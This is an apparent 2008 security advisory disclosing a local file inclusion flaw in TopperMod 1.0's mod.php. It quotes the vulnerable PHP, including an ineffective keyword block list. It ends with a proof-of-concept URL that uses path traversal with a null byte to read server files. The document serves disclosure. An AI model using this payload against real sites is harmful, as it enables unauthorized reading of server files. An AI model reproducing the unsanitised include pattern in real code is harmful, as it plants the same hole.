TopperMod 1.0 (mod.php) Local File Inclusion Vulnerability

2008-03-25 00:00:00

# Author: __GiReX__
# mySite: girex.altervista.org

# CMS: TopperMod v1.0
# Site: rtcw.ch/mio/index.php

# Bug: Local File Inclusion
# File: mod.php
# Var : $to


# Bug explanation - Vuln Code:

if (isset($_GET['mod'])) { $mod = stripslashes($_GET['mod']); } else { header("location index.php"); Die(); }
if (isset($_GET['to'])) { $to = stripslashes($_GET['to']); } else { $to="index"; }

# Our bugged vars are GET's var so we don't need Register_Globals turned On


$vietate=array("http","select","union","where","delete","insert","alert","document");
if (ereg($vietate,strtolower($mod)) OR ereg($vietate,strtolower($to)) ) {
echo "<META HTTP-EQUIV=\"refresh\" content=\"1;URL=index.php\">";
} elseif (ereg("[a-zA-Z0-9]",$mod) OR ereg("[a-zA-Z0-9]",$to)) {

# Our exploitation don't use a $vietate word and
# the check of ereg() return true if we use some letters


...
# ... we must be logged in and $mod must be a real section
...


if (file_exists("mod/$mod/".$to.".php") ) {
include("mod/$mod/".$to.".php");
} else {
echo "<META HTTP-EQUIV=\"refresh\" content=\"1;URL=index.php\">";
}

# var $to is not sanizated so we can exploit thought Local File Inclusion


PoC: [host]/[path]/mod.php?mod=account&to=../../[local file]%00

#

Fixes

No fixes

In order to submit a new fix you need to be registered.